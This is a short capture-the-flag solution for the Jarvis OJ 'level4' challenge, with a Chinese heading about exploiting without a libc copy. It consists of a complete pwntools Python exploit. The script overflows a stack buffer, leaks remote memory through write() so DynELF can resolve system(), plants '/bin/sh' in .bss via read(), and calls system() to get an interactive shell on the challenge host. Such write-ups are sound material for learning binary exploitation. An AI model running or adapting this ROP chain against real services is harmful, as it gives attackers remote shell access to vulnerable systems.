Jarvis OJ-Level4

借助DynELF实现无libc的漏洞利用小结

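#!/usr/bin/env python
# coding:utf-8
"""Jarvis OJ level4: resolve system() without a libc copy, using pwntools' DynELF.

Requires the challenge binary ``level4`` in the working directory and a
connection to the remote service; every step below is remote I/O.
"""
from pwn import *

elf = ELF('level4')

# PLT/ELF addresses are packed once as 32-bit little-endian values so they can
# be concatenated straight into the ROP payloads below.
write_plt = p32(elf.symbols['write'])
start_addr = p32(elf.symbols['_start'])      # return target after each call: re-enter _start
read_plt = p32(elf.symbols['read'])
data_addr = p32(elf.symbols['__bss_start'])  # writable scratch area for the "/bin/sh" string

# Padding up to the saved return address (0x88 bytes of buffer plus 4 for the
# saved ebp, presumably -- the binary itself is not shown here; verify with gdb).
junk = "A" * (0x88 + 4)

Io = remote("pwn2.jarvisoj.com", 9880)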

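def leak(addr):
    """Return the 4 bytes at ``addr`` in the remote process.

    Builds a chain that calls ``write(1, addr, 4)`` and then returns to
    ``_start``, so the process keeps running and the next leak can reuse the
    same overflow.  The DynELF lookup further down calls this repeatedly.

    Args:
        addr: integer address to read from.

    Returns:
        The raw 4-byte string received from the service.
    """
    payload = junk + write_plt + start_addr + p32(1) + p32(addr) + p32(4)
    Io.send(payload)
    leaked = Io.recv(4)
    print "[%s] -> [%s] = [%s]" % (hex(addr), hex(u32(leaked)), repr(leaked))
    return leaked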

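# leak the address of system()
d = DynELF(leak, elf=ELF("./level4"))
system_addr = d.lookup('system', 'libc')
print "[system()] -> [%s]" % (hex(system_addr))

# write /bin/sh: read(0, __bss_start, 8), then return to _start again
payload = junk + read_plt + start_addr + p32(0) + data_addr + p32(8)
Io.send(payload)

# send /bin/sh -- 8 bytes including the NUL, matching the read() length above
Io.send("/bin/sh\x00")

# call system(__bss_start); 0xFFFFFFFF stands in for the return address
payload = junk + p32(system_addr) + p32(0xFFFFFFFF) + data_addr
Io.send(payload)

# interactive()
Io.interactive()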
